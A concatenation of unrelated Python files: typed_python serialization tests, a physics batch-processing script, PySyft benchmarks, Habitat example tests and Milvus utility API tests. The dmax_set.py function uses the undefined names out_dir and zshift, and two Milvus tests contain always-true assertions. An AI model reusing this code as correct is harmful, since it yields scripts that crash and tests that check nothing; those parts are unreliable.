C = SerializationContext().deserialize(serializedC)
assert C.anF() is C
assert C.anF.overloads[0].methodOf.Class is C
def test_serialization_independent_of_whether_function_is_hashed(self):
s = SerializationContext().withoutLineInfoEncoded().withoutCompression()
s1 = s.serialize(moduleLevelFunctionUsedByExactlyOneSerializationTest)
identityHash(moduleLevelFunctionUsedByExactlyOneSerializationTest)
s2 = s.serialize(moduleLevelFunctionUsedByExactlyOneSerializationTest)
assert s1 == s2
def test_serialize_anonymous_class_with_defaults_and_nonempty(self):
class C1(Class):
x1 = Member(int, default_value=10, nonempty=True)
x2 = Member(str, default_value="10", nonempty=True)
x3 = Member(float, default_value=2.5)
x4 = Member(str, nonempty=True)
s = SerializationContext()
C2 = s.deserialize(s.serialize(C1))
assert C2.ClassMembers['x1'].type is int
assert C2.ClassMembers['x2'].type is str
assert C2.ClassMembers['x3'].type is float
assert C2.ClassMembers['x4'].type is str
assert C2.ClassMembers['x1'].isNonempty
assert C2.ClassMembers['x2'].isNonempty
assert not C2.ClassMembers['x3'].isNonempty
assert C2.ClassMembers['x4'].isNonempty
assert C2.ClassMembers['x1'].defaultValue == 10
assert C2.ClassMembers['x2'].defaultValue == "10"
assert C2.ClassMembers['x3'].defaultValue == 2.5
assert C2.ClassMembers['x4'].defaultValue is None
def test_serialize_unresolved_forward(self):
F = Forward("Hi")
T = NamedTuple(x=F)
s = SerializationContext()
T2 = s.deserialize(s.serialize(T))
assert T2.ElementTypes[0].__typed_python_category__ == "Forward"
def test_serialization_doesnt_starve_gil(self):
checkCount = [0]
serializeCount = [0]
contextSwaps = []
s = SerializationContext()
def loopThread():
t0 = time.time()
while time.time() - t0 < 1.0:
contextSwaps.append((0, time.time()))
checkCount[0] += 1
def serializeThread():
t0 = time.time()
while time.time() - t0 < 1.0:
contextSwaps.append((1, time.time()))
s.deserialize(s.serialize(moduleLevelRecursiveF))
serializeCount[0] += 1
threads = [threading.Thread(target=t) for t in [loopThread, serializeThread]]
for t in threads:
t.start()
for t in threads:
t.join()
contextSwaps = sorted(contextSwaps, key=lambda a: a[1])
contextSwaps = contextSwaps[:1] + [
contextSwaps[i] for i in range(1, len(contextSwaps))
if contextSwaps[i][0] != contextSwaps[i-1][0]
]
avgTimeHeld = {0: 0.0, 1: 0.0}
for i in range(1, len(contextSwaps)):
avgTimeHeld[contextSwaps[i-1][0]] += contextSwaps[i][1] - contextSwaps[i-1][1]
print("Time spent in python spin thread: ", avgTimeHeld[0], " over ", checkCount[0], " cycles")
print("Time spent in serialization thread:", avgTimeHeld[1], " over ", serializeCount[0], " cycles")
# verify that we are spending a reasonable amount of time in each thread. If
# we release the gil directly in 'deserialize' or 'serialize', then we'll end up
# starving the serialization thread because we only get the thread back every
# few milliseconds.
assert .1 <= avgTimeHeld[0] <= .9
assert .1 <= avgTimeHeld[1] <= .9
def test_serialization_context_names_for_pmap_functions(self):
from typed_python.lib.pmap import ensureThreads
sc = SerializationContext()
assert sc.nameForObject(type(ensureThreads)) is not None
|
dmax_set.py
|
#!/usr/bin/python
import os
import fnmatch
from multiprocessing import Process
import process_cup
def process_set(cups_dir, set_tag, idx_start, idx_stop, sym_Y = False):
"""
Process all shots for both collimators for a given cup tag
Parameters
----------
cups_dir: string
location of the directories with shots for all cups for both collimators
set_tag: string
set tag (R8O3IL or similar)
idx_start: int
start cup index
idx_stop: int
stop cup index, inclusive! So cups would be processed in the range [start, stop+1)
out_dir: string
output directory
zshift: float
cup Z shift relative to shot, mm
"""
sy = sym_Y
pps = []
for k in range(idx_start, idx_stop + 1):
cup_tag = "{}{:02d}".format(set_tag, k)
p = Process(target=process_cup.process_cup, args=(cups_dir, cup_tag, out_dir, zshift, sy)) # calls process_cup.process_cup(cups_dir, cup_tag, out_dir, zshift, sy)
p.start()
pps.append(p)
for p in pps:
p.join()
if __name__ == "__main__":
process_set("/home/sphinx/gcloud", "R8O1IS", 1, 9)
process_set("/home/sphinx/gcloud", "R8O2IM", 1, 10)
process_set("/home/sphinx/gcloud", "R8O3IL", 1, 9)
|
bench_test.py
|
"""
Define benchmark tests
"""
# stdlib
import atexit
from multiprocessing import Process
from multiprocessing import set_start_method
import os
import time
from typing import Any
# third party
import pytest
# syft absolute
import syft as sy
# syft relative
from ...syft.grid.duet.signaling_server_test import run
from ..pytest_benchmarks.benchmark_send_get_local_test import send_get_list_local
from ..pytest_benchmarks.benchmark_send_get_local_test import send_get_string_local
from ..pytest_benchmarks.benchmark_send_get_multiprocess_test import (
send_get_list_multiprocess,
)
from ..pytest_benchmarks.benchmark_send_get_multiprocess_test import (
send_get_string_multiprocess,
)
from ..pytest_benchmarks.benchmark_send_get_multiprocess_test import PORT
from ..pytest_benchmarks.benchmarks_functions_test import list_serde
from ..pytest_benchmarks.benchmarks_functions_test import string_serde
set_start_method("spawn", force=True)
KB = 2 ** 10
MB = 2 ** 20
LIST_TEMPLATE = "a" * (10 * KB)
@pytest.fixture(scope="module")
def signaling_server() -> Process:
print(f"creating signaling server on port {PORT}")
grid_proc = Process(target=run, args=(PORT,))
grid_proc.start()
def grid_cleanup() -> None:
print("stop signaling server")
grid_proc.terminate()
grid_proc.join()
atexit.register(grid_cleanup)
return grid_proc
@pytest.mark.benchmark
@pytest.mark.parametrize("byte_size", [10 * MB, 100 * MB])
def test_string_serde(byte_size: int, benchmark: Any) -> None:
data = "a" * byte_size
benchmark.pedantic(string_serde, args=(data,), rounds=3, iterations=3)
@pytest.mark.benchmark
@pytest.mark.parametrize("list_size", [10, 100, 1000])
def test_list_serde(list_size: int, benchmark: Any) -> None:
data = [LIST_TEMPLATE] * list_size
benchmark.pedantic(list_serde, args=(data,))
@pytest.mark.benchmark
@pytest.mark.parametrize("byte_size", [10 * KB, 100 * KB, MB, 10 * MB])
def test_duet_string_local(byte_size: int, benchmark: Any) -> None:
data = "a" * byte_size
duet = sy.VirtualMachine().get_root_client()
benchmark.pedantic(send_get_string_local, args=(data, duet), rounds=3, iterations=3)
@pytest.mark.benchmark
@pytest.mark.parametrize("list_size", [10, 100, 1000])
def test_duet_list_local(list_size: int, benchmark: Any) -> None:
data = [LIST_TEMPLATE] * list_size
duet = sy.VirtualMachine().get_root_client()
benchmark.pedantic(send_get_list_local, args=(data, duet), rounds=3, iterations=3)
@pytest.mark.benchmark
@pytest.mark.parametrize("byte_size", [10 * KB, 100 * KB, MB, 10 * MB])
def test_duet_string_multiprocess(
byte_size: int, benchmark: Any, signaling_server: Process
) -> None:
time.sleep(3)
data = "a" * byte_size
benchmark.pedantic(
send_get_string_multiprocess, args=(data,), rounds=3, iterations=3
)
@pytest.mark.benchmark
@pytest.mark.parametrize("list_size", [10, 100, 1000])
def test_duet_list_multiprocess(
list_size: int, benchmark: Any, signaling_server: Process
) -> None:
time.sleep(3)
data = [LIST_TEMPLATE] * list_size
benchmark.pedantic(send_get_list_multiprocess, args=(data,), rounds=3, iterations=3)
@pytest.mark.skip
@pytest.mark.benchmark
@pytest.mark.parametrize(
"chunk_size,max_buffer",
[
(2 ** 14, 2 ** 18),
(2 ** 18, 2 ** 23),
(2 ** 18, 2 ** 24),
(2 ** 18, 2 ** 25),
],
)
def test_duet_chunk_size(
chunk_size: int, max_buffer: int, benchmark: Any, signaling_server: Process
) -> None:
time.sleep(3)
data = "a" * (60 * MB)
os.environ["DC_MAX_CHUNK_SIZE"] = str(chunk_size)
os.environ["DC_MAX_BUFSIZE"] = str(max_buffer)
benchmark.pedantic(
send_get_string_multiprocess, args=(data,), rounds=2, iterations=2
)
|
test_examples.py
|
import itertools
import multiprocessing
import runpy
import sys
from os import path as osp
import pytest
def run_main(*args):
# patch sys.args
sys.argv = list(args)
target = args[0]
# run_path has one difference with invoking Python from command-line:
# if the target is a file (rather than a directory), it does not add its
# parent directory to sys.path. Thus, importing other modules from the
# same directory is broken unless sys.path is patched here.
if osp.isfile(target):
sys.path.insert(0, osp.dirname(target))
runpy.run_path(target, run_name="__main__")
def powerset(iterable):
s = list(iterable)
return itertools.chain.from_iterable(
itertools.combinations(s, r) for r in range(len(s) + 1)
)
def run_main_subproc(args):
# This test needs to be done in its own2 process as there is a potentially for
# an OpenGL context clash otherwise
mp_ctx = multiprocessing.get_context("spawn")
proc = mp_ctx.Process(target=run_main, args=args)
proc.start()
proc.join()
assert proc.exitcode == 0
@pytest.mark.skipif(
not osp.exists(
"data/scene_datasets/habitat-test-scenes/skokloster-castle.glb"
)
or not osp.exists(
"data/scene_datasets/habitat-test-scenes/van-gogh-room.glb"
)
or not osp.exists("data/scene_datasets/coda/coda.glb"),
reason="Requires the habitat-test-scenes",
)
@pytest.mark.parametrize(
"args",
[
(
"examples/tutorials/nb_python/Habitat_Interactive_Tasks.py",
"--no-show-video",
"--no-make-video",
),
("examples/tutorials/nb_python/Habitat_Lab.py",),
],
)
def test_example_modules(args):
run_main_subproc(args)
|
test_utility.py
|
import threading
import pytest
from base.client_base import TestcaseBase
from base.utility_wrapper import ApiUtilityWrapper
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "utility"
default_schema = cf.gen_default_collection_schema()
default_int64_field_name = ct.default_int64_field_name
default_field_name = ct.default_float_vec_field_name
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
default_dim = ct.default_dim
default_nb = ct.default_nb
num_loaded_entities = "num_loaded_entities"
num_total_entities = "num_total_entities"
class TestUtilityParams(TestcaseBase):
""" Test case of index interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_type(self, request):
if request.param == [] or request.param == "":
pytest.skip("metric empty is valid for distance calculation")
if isinstance(request.param, str):
pytest.skip("string is valid type for metric")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_value(self, request):
if request.param == [] or request.param == "":
pytest.skip("metric empty is valid for distance calculation")
if not isinstance(request.param, str):
pytest.skip("Skip invalid type for metric")
yield request.param
@pytest.fixture(scope="function", params=["JACCARD", "Superstructure", "Substructure"])
def get_not_support_metric(self, request):
yield request.param
@pytest.fixture(scope="function", params=["metric_type", "metric"])
def get_support_metric_field(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_partition_names(self, request):
if isinstance(request.param, list):
if len(request.param) == 0:
pytest.skip("empty is valid for partition")
if request.param is None:
pytest.skip("None is valid for partition")
yield request.param
"""
******************************************************************
# The followings are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_has_collection_name_invalid(self, get_invalid_collection_name):
"""
target: test has_collection with error collection name
method: input invalid name
expected: raise exception
"""
self._connect()
c_name = get_invalid_collection_name
if isinstance(c_name, str) and c_name:
self.utility_wrap.has_collection(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Invalid collection name"})
# elif not isinstance(c_name, str):
# self.utility_wrap.has_collection(c_name, check_task=CheckTasks.err_res, check_items={ct.err_code: 1, ct.err_msg: "illegal"})
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_collection_name_invalid(self, get_invalid_collection_name):
"""
target: test has_partition with error collection name
method: input invalid name
expected: raise exception
"""
self._connect()
c_name = get_invalid_collection_name
p_name = cf.gen_unique_str(prefix)
if isinstance(c_name, str) and c_name:
self.utility_wrap.has_partition(
c_name, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Invalid"})
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_name_invalid(self, get_invalid_partition_name):
"""
target: test has_partition with error partition name
method: input invalid name
expected: raise exception
"""
self._connect()
ut = ApiUtilityWrapper()
c_name = cf.gen_unique_str(prefix)
p_name = get_invalid_partition_name
if isinstance(p_name, str) and p_name:
ex, _ = ut.has_partition(
c_name, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Invalid"})
@pytest.mark.tags(CaseLabel.L1)
def test_drop_collection_name_invalid(self, get_invalid_collection_name):
self._connect()
error = f'`collection_name` value {get_invalid_collection_name} is illegal'
self.utility_wrap.drop_collection(get_invalid_collection_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: error})
# TODO: enable
@pytest.mark.tags(CaseLabel.L1)
def test_list_collections_using_invalid(self):
"""
target: test list_collections with invalid using
method: input invalid name
expected: raise exception
"""
self._connect()
using = "empty"
ut = ApiUtilityWrapper()
ex, _ = ut.list_collections(using=using, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "should create connect"})
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_invalid_name(self, get_invalid_collection_name):
"""
target: test building_process
method: input invalid name
expected: raise exception
"""
pass
# self._connect()
# c_name = get_invalid_collection_name
# ut = ApiUtilityWrapper()
# if isinstance(c_name, str) and c_name:
# ex, _ = ut.index_building_progress(c_name, check_items={ct.err_code: 1, ct.err_msg: "Invalid collection name"})
# TODO: not support index name
@pytest.mark.tags(CaseLabel.L1)
def _test_index_process_invalid_index_name(self, get_invalid_index_name):
"""
target: test building_process
method: input invalid index name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
ut = ApiUtilityWrapper()
ex, _ = ut.index_building_progress(c_name, index_name)
log.error(str(ex))
assert "invalid" or "illegal" in str(ex)
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_invalid_name(self, get_invalid_collection_name):
"""
target: test wait_index
method: input invalid name
expected: raise exception
"""
pass
# self._connect()
# c_name = get_invalid_collection_name
# ut = ApiUtilityWrapper()
# if isinstance(c_name, str) and c_name:
# ex, _ = ut.wait_for_index_building_complete(c_name,
# check_items={ct.err_code: 1,
# ct.err_msg: "Invalid collection name"})
@pytest.mark.tags(CaseLabel.L1)
def _test_wait_index_invalid_index_name(self, get_invalid_index_name):
"""
target: test wait_index
method: input invalid index name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
ut = ApiUtilityWrapper()
ex, _ = ut.wait_for_index_building_complete(c_name, index_name)
log.error(str(ex))
assert "invalid" or "illegal" in str(ex)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("invalid_c_name", ["12-s", "12 s", "(mn)", "中文", "%$#"])
def test_loading_progress_invalid_collection_name(self, invalid_c_name):
"""
target: test loading progress with invalid collection name
method: input invalid collection name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data()
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name)
self.collection_wrap.load()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(invalid_c_name)}
self.utility_wrap.loading_progress(invalid_c_name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_loading_progress_not_existed_collection_name(self):
"""
target: test loading progress with invalid collection name
method: input invalid collection name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data()
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name)
self.collection_wrap.load()
error = {ct.err_code: 1, ct.err_msg: "describe collection failed: can't find collection"}
self.utility_wrap.loading_progress("not_existed_name", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tag(CaseLabel.L1)
@pytest.mark.xfail(reason="pymilvus issue #677")
def test_loading_progress_invalid_partition_names(self, get_invalid_partition_names):
"""
target: test loading progress with invalid partition names
method: input invalid partition names
expected: raise an exception
"""
collection_w = self.init_collection_general(prefix)[0]
partition_names = get_invalid_partition_names
err_msg = {ct.err_code: 0, ct.err_msg: "`partition_name_array` value {} is illegal".format(partition_names)}
collection_w.load()
self.utility_wrap.loading_progress(collection_w.name, partition_names,
check_task=CheckTasks.err_res, check_items=err_msg)
@pytest.mark.tag(CaseLabel.L1)
@pytest.mark.parametrize("partition_names", [[ct.default_tag], [ct.default_partition_name, ct.default_tag]])
def test_loading_progress_not_existed_partitions(self, partition_names):
"""
target: test loading progress with not existed partitions
method: input all or part not existed partition names
expected: raise exception
"""
collection_w = self.init_collection_general(prefix)[0]
log.debug(collection_w.num_entities)
collection_w.load()
err_msg = {ct.err_code: 1, ct.err_msg: f"partitionID of partitionName:{ct.default_tag} can not be found"}
self.utility_wrap.loading_progress(collection_w.name, partition_names,
check_task=CheckTasks.err_res, check_items=err_msg)
@pytest.mark.tags(CaseLabel.L1)
def test_wait_for_loading_collection_not_existed(self):
"""
target: test wait for loading
method: input collection not created before
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.utility_wrap.wait_for_loading_complete(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_wait_for_loading_partition_not_existed(self):
"""
target: test wait for loading
method: input partition not created before
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
self.utility_wrap.wait_for_loading_complete(
collection_w.name, partition_names=[ct.default_tag],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: f'partitionID of partitionName:{ct.default_tag} can not be find'})
def test_drop_collection_not_existed(self):
"""
target: test drop an not existed collection
method: drop a not created collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "describe collection failed: can't find collection:"}
self.utility_wrap.drop_collection(c_name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_left_vector_invalid_type(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors type
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
if not isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(invalid_vector, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_left value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_left_vector_invalid_value(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors value
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
if isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(invalid_vector, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_left value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_right_vector_invalid_type(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors type
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
vector = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vector}
if not isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(op_l, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_right value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_right_vector_invalid_value(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors value
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
vector = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vector}
if isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(op_l, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_right value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_invalid_metric_type(self, get_support_metric_field, get_invalid_metric_type):
"""
target: test calculated distance with invalid metric
method: input invalid metric
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
metric = get_invalid_metric_type
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "params value {{'metric': {}}} "
"is illegal".format(metric)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_invalid_metric_value(self, get_support_metric_field, get_invalid_metric_value):
"""
target: test calculated distance with invalid metric
method: input invalid metric
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
metric = get_invalid_metric_value
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "{} metric type is invalid for "
"float vector".format(metric)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_not_support_metric(self, get_support_metric_field, get_not_support_metric):
"""
target: test calculated distance with invalid metric
method: input invalid metric
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
metric = get_not_support_metric
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "{} metric type is invalid for "
"float vector".format(metric)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_invalid_using(self, get_support_metric_field):
"""
target: test calculated distance with invalid using
method: input invalid using
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
params = {metric_field: "L2", "sqrt": True}
using = "empty"
self.utility_wrap.calc_distance(op_l, op_r, params, using=using,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "should create connect"})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_not_match_dim(self):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors type and value
expected: raise exception
"""
self._connect()
dim = 129
vector_l = cf.gen_vectors(default_nb, default_dim)
vector_r = cf.gen_vectors(default_nb, dim)
op_l = {"float_vectors": vector_l}
op_r = {"float_vectors": vector_r}
self.utility_wrap.calc_distance(op_l, op_r,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Cannot calculate distance between "
"vectors with different dimension"})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_collection_before_load(self, get_support_metric_field):
"""
target: test calculated distance when entities is not ready
method: calculate distance before load
expected: raise exception
"""
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb,
is_index=True)
middle = len(insert_ids) // 2
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"field": default_field_name}
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"field": default_field_name}
metric_field = get_support_metric_field
params = {metric_field: "L2", "sqrt": True}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection {} was not "
"loaded into memory)".format(collection_w.name)})
class TestUtilityBase(TestcaseBase):
""" Test case of index interface """
@pytest.fixture(scope="function", params=["metric_type", "metric"])
def metric_field(self, request):
yield request.param
@pytest.fixture(scope="function", params=[True, False])
def sqrt(self, request):
yield request.param
@pytest.fixture(scope="function", params=["L2", "IP"])
def metric(self, request):
yield request.param
@pytest.fixture(scope="function", params=["HAMMING", "TANIMOTO"])
def metric_binary(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L1)
def test_has_collection(self):
"""
target: test has_collection with collection name
method: input collection name created before
expected: True
"""
cw = self.init_collection_wrap()
res, _ = self.utility_wrap.has_collection(cw.name)
assert res is True
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_not_created(self):
"""
target: test has_collection with collection name which is not created
method: input random collection name
expected: False
"""
c_name = cf.gen_unique_str(prefix)
_ = self.init_collection_wrap()
res, _ = self.utility_wrap.has_collection(c_name)
assert res is False
@pytest.mark.tags(CaseLabel.L1)
def test_has_collection_after_drop(self):
"""
target: test has_collection with collection name droped before
method: input random collection name
expected: False
"""
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.has_collection(c_name)
assert res is True
cw.drop()
res, _ = self.utility_wrap.has_collection(c_name)
assert res is False
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition(self):
"""
target: test has_partition with partition name
method: input collection name and partition name created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
p_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
self.init_partition_wrap(cw, p_name)
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is True
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_not_created(self):
"""
target: test has_partition with partition name
method: input collection name, and partition name not created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
p_name = cf.gen_unique_str()
self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is False
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_after_drop(self):
"""
target: test has_partition with partition name
method: input collection name, and partition name dropped
expected: True
"""
c_name = cf.gen_unique_str(prefix)
p_name = cf.gen_unique_str()
cw = self.init_collection_wrap(name=c_name)
pw = self.init_partition_wrap(cw, p_name)
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is True
pw.drop()
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is False
@pytest.mark.tags(CaseLabel.L2)
def test_has_default_partition(self):
"""
target: test has_partition with '_default' partition
method: input collection name and partition name created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.has_partition(c_name, ct.default_partition_name)
assert res is True
@pytest.mark.tags(CaseLabel.L1)
def test_list_collections(self):
"""
target: test list_collections
method: create collection, list_collections
expected: in the result
"""
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.list_collections()
assert c_name in res
# TODO: make sure all collections deleted
@pytest.mark.tags(CaseLabel.L1)
def _test_list_collections_no_collection(self):
"""
target: test list_collections
method: no collection created, list_collections
expected: length of the result equals to 0
"""
self._connect()
res, _ = self.utility_wrap.list_collections()
assert len(res) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_not_existed(self):
"""
target: test building_process
method: input collection not created before
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.utility_wrap.index_building_progress(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_empty(self):
"""
target: test building_process
method: input empty collection
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(cw.collection, default_field_name, default_index_params)
res, _ = self.utility_wrap.index_building_progress(c_name)
exp_res = {'total_rows': 0, 'indexed_rows': 0}
assert res == exp_res
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_insert_no_index(self):
"""
target: test building_process
method: insert 1 entity, no index created
expected: no exception raised
"""
nb = 1
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
error = {ct.err_code: 1, ct.err_msg: "no index is created"}
self.utility_wrap.index_building_progress(c_name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_index(self):
"""
target: test building_process
method: 1.insert 1024 (because minSegmentSizeToEnableIndex=1024)
2.build(server does create index) and call building_process
expected: indexed_rows=0
"""
nb = 1024
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
cw.create_index(default_field_name, default_index_params)
res, _ = self.utility_wrap.index_building_progress(c_name)
assert res['indexed_rows'] == 0
assert res['total_rows'] == nb
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_indexing(self):
"""
target: test building_process
method: 1.insert 2048 entities to ensure that server will build
2.call building_process during building
expected: 2048 or less entities indexed
"""
nb = 2048
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
cw.create_index(default_field_name, default_index_params)
res, _ = self.utility_wrap.index_building_progress(c_name)
assert (0 < res['indexed_rows'] <= nb)
assert res['total_rows'] == nb
# for _ in range(2):
# assert "indexed_rows" in res
# assert res["indexed_rows"] <= nb
# assert res["indexed_rows"] >= 0
# assert "total_rows" in res
# assert res["total_rows"] == nb
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_collection_not_existed(self):
"""
target: test wait_index
method: input collection not created before
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.utility_wrap.wait_for_index_building_complete(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_collection_empty(self):
"""
target: test wait_index
method: input empty collection
expected: no exception raised
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
cw.create_index(default_field_name, default_index_params)
assert self.utility_wrap.wait_for_index_building_complete(c_name)[0]
res, _ = self.utility_wrap.index_building_progress(c_name)
exp_res = {'total_rows': 0, 'indexed_rows': 0}
assert res == exp_res
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_collection_index(self):
"""
target: test wait_index
